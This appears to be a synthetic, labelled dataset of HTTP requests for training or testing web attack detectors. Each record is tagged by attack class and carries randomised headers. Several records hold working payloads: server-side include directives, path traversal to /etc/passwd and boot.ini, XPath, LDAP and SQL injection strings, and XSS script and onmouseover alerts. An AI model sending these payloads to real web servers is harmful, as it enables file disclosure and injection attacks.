Max-Forwards: 9182
Pragma: lem9qhr='pm9'
Proxy-Authorization: Digest realm
Range: -09,53938-,-91
Referer: /t3ip7.asmx
User-Agent: Mozilla/2.5 (X11; U; Open BSD i586 3.8; ht-hm; rv:5.6.3) Gecko/83494372
UA-CPU: x86
Via: FTP/4.5 179.169.243.39
Transfer-Encoding: gzip

null

End - Id: 42914
Start - Id: 40884
class: SSI
GET /0yimdaAo/yMbQ/1DLn0_PX/iytd2omxkoenarctc/cnethlsD55isgz8oh/AcforA/ec1nTx8alaaqte/mv/tO05wt2O/sZYF3EGnW/tt4rinCaeThtlif/snaosetdees.html?doxrArfop=otl2wgyCsqe%2Bau&h05iframeija8Hvz=%25%5D0ai&aeTuAaEqit8x=o+n&6vZdTuxE_=%29&rSz7apasaem=%3C%21--++++%23odbc+++statement+++%3D++++%22select++++narsng7s%2C++ei%2C++++eOAf++++from++++wgoaSsenh+order++++by+4%2C++28%2C+++6%22+++--%3E&aalid=0887578&2r=693603595&tr3aeshhss=I%2Bomteso&rm=306&p7DJ1J7PQ7=e9yerserunre2e&uecewnaant=78770&bTUiiicov4n=n HTTP/1.0
Host: www.8lnaesx.it:80
Connection: close
Accept: audio/basic
Accept-Charset: cp-936;q=0.3, utf-8;q=0.2, iso-2022-jp, iso-8859-3;q=0.3, x-mac-greek
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 18.195.218.180
Cookie: homeiNimg_rcp-_=lnsedmf1Eunrs;WG-JGFA=asock_streamn;Telboaer=eRVm5byi;te88nikrctc2tiH=79;sa4mj3=urlo;oElop4v=rxZX0oyvDF
Cookie2: $Version="14"
Date: Sun, 10 Jul 05 22:01:26 UTC
ETag: W/"cdUEMz1rdtb6L7v"
Expect: Bsieuw=kptnu;mohtt
From: iead0@nuqh1.org
If-Modified-Since: Wed, 23 Jul 08 14:12:04 UTC
If-Unmodified-Since: Wed, 12 Apr 06 15:17:29 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 24 Jun 07 17:47:15 UTC
Max-Forwards: 1834
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: dMod 5D9t4=toait6i
Range: 453-748
Referer: http://www.18enh2.com/SefstsOl/aait/04viowm7/cheioohe/lpwh.png
TE: trailers
Trailer: Accept-Charset
User-Agent: oggyoteld (ssvfiI8Dw; sB6vSJaaum)
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: 1.4 151.187.253.95
Transfer-Encoding: deflate
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 71520
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40884
Start - Id: 39427
class: SSI
GET /xgJ-ahnZZpbqXNbM/tA1LpSljqkYGTV/sa/inputbinlv@IFJjD3QmochaX.png?ysrseqayL=f%7E%2Fnhyhtgi%3DW%5CA&MhavingJdZ=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&rleleic5axtEi=s&9i5=86222 HTTP/1.1
Host: 161.96.11.210
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: ale5cao-ieh, eAsE-nhXnE, eisIyw-rorlte
Cache-Control: no-transform
Client-ip: 126.45.36.156
Cookie: knLlooep9ba4Aft=6e;dnxtaxnhinzmoPt=nsXy
Cookie2: $Version="308"
Date: Sun, 23 Jan 05 02:24:41 UTC
ETag: W/"qlXtqujxENs2lqE1RtE"
Expect: 100-continue
From: w3by414@hseh.net
If-Modified-Since: Thu, 18 Feb 10 12:31:28 GMT
If-Unmodified-Since: Thu, 19 May 05 16:51:46 GMT
If-Match: "aB5KlgUag0TmNfM"
If-None-Match: "-o1KkDjwYbSvMHeru"
If-Range: "UEN237j9xGISaWF.2JR"
Max-Forwards: 6813
MIME-Version: 3.5
Pragma: ht=hOmppd
Proxy-Authorization: rashN riiam=cssstki
Authorization: Basic c2FsZ250OjlzcDB0
Range: -07524
Referer: /Datuawra/hhehmhnt.htm
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.0 (Windows; U; Win 9x 8.2; Te-Ke; rv:9.7.5) Gecko/63927944
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3896x417
Via: 1.4 www.i6Bq.gif:29, 8.9 117.112.188.30, 8.2 www.morecd.jpeg
Transfer-Encoding: identity
Upgrade: Tnfr/9.0, twtet/7.7, sbse/4.5, iht/4.1, rei/1.4
Warning: 280 113.181.5.189:613 "neo5iip" "Wed, 20 Feb 08 05:16:28 CET"
X-Serial-Number: 7022355683967600
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39427
Start - Id: 45696
class: PathTransversal
GET /stweniErndcxeiyth1wh.tiff?bdX7_.EMSM=81&CRB1documentLQy=7589316&nihhiNiInu=pis8iotkyRli&hO@tnU=5228&ctszi=w%3A%5Cwindows%5Cboot.ini&iKkC=hb1eininheouSt8lw7 HTTP/1.1
Host: www.j5Exvx.uk
Connection: etRxteia
Accept: */*
Accept-Charset: windows-1252
Accept-Encoding: identity;q=0.1, deflate;q=0.7, identity, compress;q=0.1
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 81.244.184.6
Cookie: esuos=1t1hen6rmd;DTvSTM-=uaws;scasen1on=7269679;d8aVaaaoz=fynxEDoDxWG;s5e2H1eehs=5 hghttp)t|h
Cookie2: $Version="746"
Date: Tue, 09 Sep 08 17:57:09 GMT
ETag: "VHa4Nom4Fc_0gLMYw6WP"
Expect: 100-continue
From: ielefwrj@3csCfee.fr
If-Modified-Since: Wed, 01 Jun 05 04:33:33 GMT
If-Unmodified-Since: Fri, 01 Apr 05 02:51:55 GMT
If-Match: *
If-None-Match: *
If-Range: "uI3J2d3rGW5NAp2fMVa-"
Max-Forwards: 5317
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: iauui tpnx43o=hneenas
Range: -934,-807,-703421
Referer: http://www.ToTOo2.cz/wc6aa9.dll
TE: chunked;q=0.9,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: iyg0/6.6
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6938x271
Via: 4.6 237.41.149.212:70355, FTP/3.7 www.idny.jpg:4
Transfer-Encoding: deflate
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 474 www.oRarFe.gif "irxQnatwEeiNheieol" "Sat, 16 Aug 08 18:32:38 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45696
Start - Id: 35532
class: XPathInjection
PUT /sOSvVK@ObCQ10yk9/iC/pnesttesooroDlcodUb/t49YXR7hUj9vvA3O/httpsZ.1pq..mspx? HTTP/1.1
Content-Length: 252
Content-Language: ji
Content-Encoding: identity
Content-Location: /a2co/ilntE/uc9ne/utsOo.mdb
Content-MD5: NXlkaHNsc0RscjJvY21ldA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Oct 08 01:15:06 UTC
Last-Modified: Mon, 14 Sep 09 13:16:10 UTC
Host: 112.209.13.61
Connection: noegi5ei
Accept: audio/*;q=0.9
Accept-Charset: macintosh;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 106.66.65.58
Cookie: oycrtrcgortE=825;inqcltvhltb59=aeHm0XqPdX
Cookie2: $Version="891"
Date: Thu, 05 Nov 09 14:14:52 CET
ETag: W/"nTFrm6Ac_m@v9GKXfJ4n"
Expect: jeseiyqo=oozs
From: ddsory@ail3hIue.st
If-Modified-Since: Fri, 03 Jul 09 01:12:59 GMT
If-Unmodified-Since: Sat, 20 May 06 19:30:49 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 17 Oct 05 02:28:36 UTC
Max-Forwards: 704
MIME-Version: 8.9
Pragma: ena='amtet'
Proxy-Authorization: Digest nonce
Authorization: Basic dnVhN3M6bnByMmE=
Range: 7-26018,971548-,-1
Referer: http://i0eti.biz/eatOq/xtho.rar
TE: trailers,chunked;q=0.6
Trailer: If-Unmodified-Since
User-Agent: rDaxiqi http://www.6lla.org
UA-CPU: 68000
UA-Disp: 740,794,8
Via: 8.3 164.7.111.234
Transfer-Encoding: identity
Upgrade: hs1gw/0.3, rdt/3.0
Warning: 074 www.hio17hmp.gif "oloAfT" 
X-Forwarded-For: 182.111.185.137
----: -------------

RDugu=mznnrl'     or   count(  path/child::node()[position( )=((    i   +  j   +k    +l  +1)]     |  path/child::*()[position()=(k+1)])=1  or  'el7teo'  =  '   5tcde2'   or

End - Id: 35532
Start - Id: 46401
class: PathTransversal
GET /zeaDobfehr8fece/oV5GDuFd2_vFbt-vhpr3/Hhnm/1zaerio.bin?shutdowno3Plike4ZC@=aysortitehan&ZTetcdehtolj7nl=35&etorfessalregm=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.1
Host: www.hufoec.ch:9
Connection: close
Accept: */*
Accept-Charset: shift_jis;q=0.0, ks_c_5601-1987, us-ascii, iso-8859-7;q=0.5
Accept-Encoding: gzip
Accept-Language: eonnneze-e, dlneess-nc;q=0.3, rjt-irovwnk
Cache-Control: no-store
Client-ip: 43.64.25.189
Cookie: chefhUed=Ehs>5ui=net -sdachild6da;EuG=rlocationeN;eMXaso8lonq6sn=thrlah];OL;mEmawoN=zecoli;t
Cookie2: $Version="4"
Date: Tue, 08 Dec 09 02:55:07 CET
ETag: W/"AuAN-mgN8NIK-@ZSw.r"
Expect: 100-continue
From: eitn@airwo.uk
If-Modified-Since: Sat, 19 Dec 09 07:15:53 GMT
If-Unmodified-Since: Tue, 04 Jan 05 10:40:27 GMT
If-Match: "jnL_ddsF5ggrN6p"
If-None-Match: "iysPBxTwY.87qTgwl.."
If-Range: *
Max-Forwards: 249
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: Basic eWFoRWw6aGxlMWg=
Range: 0-,-1441,-234089
Referer: /goTn/SeeIo.avi
TE: gzip;q=0.2
Trailer: TE
User-Agent: Mozilla/4.6 (Windows; U; Win 9x 2.8; so-pc; rv:3.3.5) Gecko/38696261
UA-CPU: MIPS
UA-Disp: 9745,801,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 999x039
Via: 7.0 251.86.133.152, 8.0 www.hAee.tiff:908
Transfer-Encoding: compress
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 070 www.eidmeFjN.shtml "nisl" 
X-Forwarded-For: 141.149.156.77
X-Serial-Number: 22445
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46401
Start - Id: 37253
class: LdapInjection
GET /kP6uA8e/4E5Me/pz5wp-divMD/eB8c7tH6E/aNXdec9WFlR/ddo3iatet/cl1vdNh/dUdR/strmmsisa6yizsm.shtml?eiehTBtPhadt6ze=59%29%28%26%28objectClass%3Dv6G%29%28%7C%28sn+%3D++mli%29%28cn%3Dx++++J*%29%29 HTTP/1.0
Host: 23.172.112.2
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.8, identity;q=0.4
Accept-Language: *;q=0.3
Cache-Control: min-fresh=04
Client-ip: 112.64.200.186
Cookie: iteurchmv=oe3;mmeotsbuces=or\4rwnwet
Cookie2: $Version="9"
Date: Sun, 14 Jun 09 12:54:17 UTC
ETag: W/"bNc0uNmABEHOP3zCY98w"
Expect: 100-continue
From: tlclo@pOIec.be
If-Modified-Since: Thu, 05 Mar 09 24:37:21 UTC
If-Unmodified-Since: Mon, 14 Jan 08 19:47:27 UTC
If-Match: "@8DU.pcaXN-DKvX"
If-None-Match: "1y5S9ElnJXoorOnIe"
If-Range: "EHVwY9P2r3_JfWszoY.t"
Max-Forwards: 0482
Pragma: Lstioa=go4tmmnc
Proxy-Authorization: Basic c2U1ZlE6Z3RhYWp0bXQ=
Authorization: Digest cnonce="scdsYitU"
Referer: http://www.Chasoate.cz/lstk.jpg
TE: trailers,gzip;q=0.3,deflate
Trailer: Warning
User-Agent: pvPe4juUaI http://www.ghxssEt.de
UA-CPU: 68000
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1371x144
Via: iaod/1.9 www.albtAee.gif
Transfer-Encoding: compress
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37253
Start - Id: 41665
class: SqlInjection
GET /swwerflt5blctm/v3CgUbEr/tf.bin?futA3ddh5p7Nyn=+++++OR+2++%3E+1 HTTP/1.0
Host: www.4uoale.org:80
Connection: Pdsd
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 239.57.78.114
Cookie: hptS3hHrao=hlthaccess_logEulandm;dlaneritanped=3068105;ahntl=4I4DVC;p9l4hAv=165;PacI=1970
Cookie2: $Version="783"
Date: Sun, 07 Mar 04 12:30:54 UTC
ETag: "FH8-9ZBlEp69RKFe"
Expect: tdqm
From: xwDNo@mseaaa.st
If-Modified-Since: Tue, 06 Nov 07 24:16:27 CET
If-Unmodified-Since: Mon, 23 Nov 09 09:06:15 GMT
If-Match: *
If-None-Match: "iPWt3SVefv-fKlN"
If-Range: Sat, 14 Jul 07 19:51:17 GMT
Max-Forwards: 3
MIME-Version: 3.1
Pragma: Ao6rrxo='qal7o8t'
Proxy-Authorization: ewnBd ycpeari1=oiYepi
Authorization: Digest username="tiwoSh"
Range: 8646-84,-596087,4-03835
Referer: http://osete.com/gdoott.mspx
TE: trailers
Trailer: Host
User-Agent: 1IvS8J http://www.ref4.de
UA-CPU: MIPS
UA-Disp: 2834,2406,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: 6.1 www.iedatda.js, 8.2 www.eioe.gif, FTP/0.1 227.63.33.150
Transfer-Encoding: compress
Upgrade: i2e/5.2, E6w/3.7, mge/6.8
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41665
Start - Id: 38727
class: LdapInjection
GET /tg.b7.hv10T7sTt6/tye3eaenriegc/1f2r/synQo3l1.r.om2/di/2bcsiKNUb/su56ztsacaotswS/le0.css?acLwe=dBH5j&D@formfrom6servicesscriptBSimg=aeE%25t+Hrha%5Cscripte7a%3Fthmi&gtewa=-&2SncK3cBw=%29+++%28+%7C++++%28displayName%3Dhad*%29+%28name%3D+had*++%29%28++mail%3Dhad*+%29&wvvf=rwe4Xr9%26ud&ej=nylF&tan=o+et%5Cn%28ateeue&t3Hadr=9uEVkkHa2k%40&wta8set3oh=tls HTTP/1.0
Host: www.rltenxbiS.fr
Connection: close
Accept: video/*, application/*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, compress, gzip;q=0.8
Accept-Language: idne-Aet, oh-nBs7, l2F-eg;q=0.5, sae9-eb6sts;q=0.0
Cache-Control: no-store
Client-ip: 132.36.253.148
Cookie: 4a7n=oenneaAnhNi ;2hyrc=idseeztir0Hwzo7n2;c8Xsm=s-gb613ALsPE;swvc4fepeR=826927731
Cookie2: $Version="15"
Date: Sun, 06 Jul 08 10:56:48 CET
ETag: "QB_Ra65Zn9G0M2Xodqta"
Expect: 100-continue
From: ilrb@h5ihiwr.cz
If-Modified-Since: Tue, 06 Nov 07 15:34:13 GMT
If-Unmodified-Since: Sun, 22 Feb 04 18:08:18 GMT
If-Match: "AEFRn_BfxVQKRWtDbZI"
If-None-Match: *
If-Range: "zPR6Mgx2wjwXWv5Qm1k"
Max-Forwards: 0509
MIME-Version: 7.8
Pragma: ggn='wI3hn'
Proxy-Authorization: ztgn ZDrc=dnonaeea
Authorization: NTLM dGNucnJ1NG5scmkzZG5uSGF0bnRldHJBbzh6ZFJkc3llYm1lZXQydw==
Range: 5873-
Referer: http://www.qxtweot.it/p1trbrfo.mspx
TE: gzip;q=0.9,deflate
Trailer: Authorization
User-Agent: Mozilla/2.1 (Machintosh; U; Mac OS X 7.7; nh-re; rv:1.0.4) Gecko/35999382
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x3377
Via: 7.3 79.47.162.18
Transfer-Encoding: compress
Upgrade: u3thye/4.0, rfee/2.0
Warning: 710 168.112.195.187 "tiseidiPedr0p" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 9623929231102541255
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38727
Start - Id: 46938
class: XSS
POST /xrB5q0JTgU9t/hish8/oatMc0dE0naeieebe/hEQdC/ncQ-uyYwq/Gam1Q/hgWi3jY_tw.js? HTTP/1.0
Content-Length: 357
Content-Language: Wwn
Content-Encoding: compress
Content-Location: http://wkalem.ch/nlyE0jtm/onuCeoio/a7xo.css
Content-MD5: UmxzaGFBc2VlZTZiRGhOcA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Jul 05 08:50:01 CET
Last-Modified: Tue, 04 Dec 07 23:28:09 UTC
Host: 147.252.130.18
Connection: uReo
Accept: audio/x-wav, text/*, text/*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: identity, compress;q=0.2
Accept-Language: Eca9o-etqdThBu;q=0.2, etnfsnd-ricrLo;q=0.9, d-u;q=0.5, Ydt-rquus;q=0.7
Cache-Control: max-stale=245
Client-ip: 68.207.188.146
Cookie: rt0p2ne6qsArw=wkjeg;pnmpreTonAa=s|yhpasswde;uwyeaezra=e|7tautoexechd5ft~ soa;hlkst= E->;J1JJNreplaceqVautoexecH=nullwmps
Cookie2: $Version="688"
Date: Mon, 05 Jan 09 11:26:24 UTC
ETag: W/"zS@IPwMakTh0z0W5imO"
Expect: 100-continue
From: nhatwm@untrh.biz
If-Modified-Since: Sat, 17 Sep 05 07:08:46 GMT
If-Unmodified-Since: Mon, 12 May 08 22:06:41 GMT
If-Match: *
If-None-Match: *
If-Range: "0pYLy4@pjh3.D@_"
Max-Forwards: 6896
MIME-Version: 1.5
Pragma: eme='sm'
Proxy-Authorization: Basic Y3BzTW06d3lkc04=
Authorization: NTLM cHhhdGhEYWFjYXplZ21odGllbnBhbnZpbE5maHNvcmll
Range: 455810-240,-24385
Referer: /Sedtneyc/mlige/h8tur/itirra.php3
TE: trailers,trailers,deflate;q=0.8
Trailer: TE
User-Agent: Mozilla/4.4 (X11; U; Linux i386 4.7; es-pb; rv:8.3.8) Gecko/67545867
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0837x527
Via: FTP/0.8 www.wkhtrh.gif, 8.0 109.228.109.100:42, soe/1.6 www.eStm.gif
Transfer-Encoding: deflate
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 764 www.ematse.tiff "gAijntrahti" "Thu, 26 Apr 07 12:05:11 GMT"
X-Forwarded-For: 207.203.23.208
X-Serial-Number: 4682138
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

utbmeruroife9et=ua3y&nso42Jasibon=ohugsjFh&LQiwL=teprocessing-instruction&wseas=e_m&piol2eaua=wmtH?eee sha&taty=1&lfnoLatuni0i=2ec htt&HIUy_YobPK=iNrw ihaving&qj0nb=aNXouf8c&uiohdheifdo=i9D&nShnod9fDieoian=s4rag\isrr(t&_bYYPstylelike@97=?eOu67yTe|&apez6jd=ayenxej7n&-in4Nu0KON=script  alert (0llerhai7ls.hm9aw)script   &aemsiy=dad7ae9eaosEedlh

End - Id: 46938
Start - Id: 46778
class: XSS
PUT /fS7hMsi9SV7yfggES897/bsge4K4dUcH/heae0wmhgTtxfcenhOwe/uShebTgelrls1Ammtr/aI/sIe5ivf70imamTmesb/lb3ehnysv/iesuhptopo3eeoioe.cgi? HTTP/1.0
Content-Length: 214
Content-Language: sIAj1U,ds,Qy
Content-Encoding: identity
Content-Location: /grreprit/o1htaE/nlRm0.jsp
Content-MD5: c2lTRGVyMmNlNHR4bnN0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Jun 05 04:04:22 UTC
Last-Modified: Thu, 08 Mar 07 09:04:57 GMT
Host: 93.178.86.58:8
Connection: keep-alive
Accept: image/jpeg, text/*;q=0.4, text/*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: DTa9-txiCenj, t-8Ltg;q=0.0, lL3y9-coe7PolH;q=0.5
Cache-Control: no-store
Client-ip: 76.116.125.91
Cookie: 73inIri9=om6rve5|th:;elemaacah6Sxaa=e4eyOi>hxMBLbnd;emat=ze;dAcldlte9hr=g-@QeP;unrdhrOeh=Rerdo8u;vauenew=92104837
Cookie2: $Version="216"
Date: Thu, 24 Jan 08 06:21:05 UTC
ETag: W/"Ufr4QY4Us830CuN9T"
Expect: pnwtm=hnizs
From: dyenT@gpt6glsG.cz
If-Modified-Since: Thu, 14 Aug 08 14:47:28 CET
If-Unmodified-Since: Thu, 05 Apr 07 01:49:49 GMT
If-Match: "CPkEzOXatVZ9gEKcjO"
If-None-Match: "Vt60Asb7ZcDmgpveNk"
If-Range: "QfKIttdW1bIcGTA-4LN"
Max-Forwards: 3
MIME-Version: 7.2
Pragma: tAZewos='lstla'
Proxy-Authorization: Digest opaque="9mhcA"
Authorization: Basic M01xc1NyaTp0ZHJz
Range: 462-
Referer: http://fletbia.net/kTcdcam/elut/fewas/ttEF7rab.wav
TE: deflate,trailers,deflate;q=0.2
Trailer: Trailer
User-Agent: Mozilla/0.1 (Machintosh; U; PPC 1.2; au-eb; rv:6.5.9) Gecko/99482866
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1199x1516
Via: FTP/2.8 www.tmaturm3.htm
Transfer-Encoding: gzip
Upgrade: ggs4o/0.2, ohoge/3.3, yemtX/6.0, tweoe/2.9, anym/6.6
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 80684101
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

feagiimr4ghohai=<div   onmouseover = "[alert ('chidpinlr');]    ">&vthtN=odqenieb&tl=dLubbhe&EuI&nyee5f7riaS46p=541637&em6c3itfeudnuh=iframe&nceau4r6XsJotte=5632835318&iZedhop=0elaer25tkiy

End - Id: 46778
Start - Id: 38382
class: LdapInjection
GET /tZIMt_te.VzJyF-K/3-lL2le4/fkc/8g9hSHMU1Wha4_dw/k9u19WeKjfDte4/rAdOfpositionO/3idfc4jd/lL/tehrxahe6akYunhsqe/nN8teideOtfjTe3v/sxzosHy/amsfOgisut.php?tichmldudm=%29%28+++%7C+++%28hao%3Dle*%29&documentC1ohT-tmpuu=sCf4S2l4P&Pwt1eStsagni=connectaQxGoin&vOek4GAJ4=%3Ale%7E1t HTTP/1.0
Host: www.BAeelnld.de
Connection: Whdtefc
Accept: */*
Accept-Charset: cp-950, x-mac-greek
Accept-Encoding: *;q=0.7
Accept-Language: tnpo70oe-aebvnr;q=0.4, eTsnmr-6r, alttgcs-ales, uayVu-sieot;q=0.6
Cache-Control: no-store
Client-ip: 154.67.228.204
Cookie: zehit53m=u7e;woo=copylaixuo-golNNi;senrymudst=we6yaey2eluor;Rue33Nr= ndr;atouenTvve05= itdm;1co7s4f0=nph-eetoeeye
Cookie2: $Version="442"
Date: Fri, 12 Mar 04 05:23:55 CET
ETag: W/"E.2nb8DPVE2Tf_9"
Expect: 100-continue
From: e3ig@cUsnasr.com
If-Modified-Since: Tue, 18 Sep 07 03:33:15 CET
If-Unmodified-Since: Wed, 30 May 07 24:53:44 UTC
If-Match: "x3Veeu-2SRCXR1YS"
If-None-Match: *
If-Range: Mon, 01 Jan 07 08:44:26 UTC
Max-Forwards: 21
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="mn9qe5l"
Authorization: Digest realm
Range: -74,-7,5-53601
Referer: /EeiOe/hfhsmfte/3ruse/ss94h.exe
TE: gzip;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: 0tec/0.4.9
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: 4.2 www.EsitnhmE.jpeg, 5.1 155.128.205.112
Transfer-Encoding: deflate
Upgrade: ottf/8.1, nEtN/4.3, m1n4n/1.7, fN2/3.2, attfJ/3.6
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 18.81.134.210
X-Serial-Number: 85165873223938
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38382
Start - Id: 45274
class: PathTransversal
GET /Ttdm/.-B8XZ2Uiframea5abR6/tsRpwp-k/stqYTWjqy/opnEanh/0eeswhsTtdyDo/KNbk@Z0Bobject9insertinclude/iH9eh.gif?tf=89&eedu1=pI HTTP/1.1
Host: 110.194.55.189
Connection: close
Accept: image/*, application/*
Accept-Charset: x-mac-cyrillic;q=0.2, iso-8859-4, euc-kr
Accept-Encoding: ..........................WINNTsystem.ini
Accept-Language: *;q=0.2
Cache-Control: max-age=9837
Client-ip: 23.217.24.228
Cookie: nehaTroci=oesoioettrpEehr;e9G=elcne81iupdate7cieol
Cookie2: $Version="97"
Date: Sat, 10 Feb 07 05:52:05 CET
ETag: W/"bjDdhSVT3_WpTA4x"
Expect: 100-continue
From: ra7rtweh@ttrsy.org
If-Modified-Since: Sat, 02 May 09 23:48:32 GMT
If-Unmodified-Since: Sun, 13 Nov 05 01:13:27 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3974
MIME-Version: 1.6
Pragma: nohaa1bi=serw
Proxy-Authorization: Basic enRvTzphaXFu
Authorization: inaeD5 dsrobor4=hcsda
Range: 259-814,-6312
Referer: http://www.1Wteem.com/rlniio/npyt.php3
TE: deflate;q=0.9,trailers
Trailer: Authorization
User-Agent: Mozilla/0.8 (Windows; U; Win 9x 5.4; 7s-dn; rv:9.2.5) Gecko/95085927
UA-CPU: StrongARM
UA-Disp: 4571,953,16
UA-Pixels: 0624x6647
Via: 4.1 214.35.126.181, 7.2 www.Eiwst5.jpg:09, FTP/9.7 www.tt8Ec.htm
Transfer-Encoding: ebhIt3; siDelcnc=oXot
Upgrade: hau3E/8.8, 3q3eqe/2.3, eaxe4/7.9
Warning: 494 255.48.101.36:36380 "e28hr" 
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45274
Start - Id: 37154
class: LdapInjection
GET /id4.ahqCDCj@x/erelgAiOeoehtfvde/-SIwxjpositionsock_streamn/fJ-Ntc/-RPBMOt.jpg?bgsoundpusrCThtpassohvAtelnet=+a1+%24&enaN7slf0e=363256&iwr6loidT=onellkntv07itIsp&rxseeae6lak=%3Dffeheip&ytdHH8lbmdue=m6gKJ&rcpObxftmpyhtaccesO=ioSae6ti&vTXxMoP2=fio%5Dtqx&h1usrKbK7HL@copyL=5667&7OFlocationkpk=64761&nr8vHZG7B=%29+++%28++%7C++%28++cn%3D*o+++%27brien*%29%28mail+%3D*o%27brien*++%29+++&vh=7678194&bs=66906 HTTP/1.0
Host: 34.73.234.46
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: r8S-o, bldso2dN-E9ybri, ek-tbsea;q=0.7, nrga-rrolmi;q=0.8, 2oy3wi-5ei
Cache-Control: no-store
Client-ip: 159.233.41.170
Cookie: WaaeSwOiCtogA9n=otad;iic=tSSzKnjlbQ4X;IEeyiTa2zohyot=+n;5eoaseeh=3974142
Cookie2: $Version="12"
Date: Mon, 19 Jun 06 15:13:28 GMT
ETag: W/"tPQ1V2111a4tmCmWTe"
Expect: ltdttsO
From: yoqtrue@reaT2e.be
If-Modified-Since: Tue, 05 Apr 05 03:06:08 CET
If-Unmodified-Since: Sun, 24 Sep 06 16:01:19 UTC
If-Match: *
If-None-Match: "vYThNU@fmW8EKJg"
If-Range: "0tws3ITxulaOK84XSM"
Max-Forwards: 1436
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Basic RWVxYXBiYjpuZXdsdw==
Range: 183458-,10781-99705
Referer: http://www.l7Hl3gir.it/earhgidr/tEs5/d4fl/2etne.mpg
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.5 (Windows; U; Win 9x 0.6; ep-tk; rv:8.9.0) Gecko/46877285
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: cpt4r/0.8 www.obdsCeu.gif:0, 2.6 www.Rrrtoi.htm, 6.7 www.Dlcn.jpeg
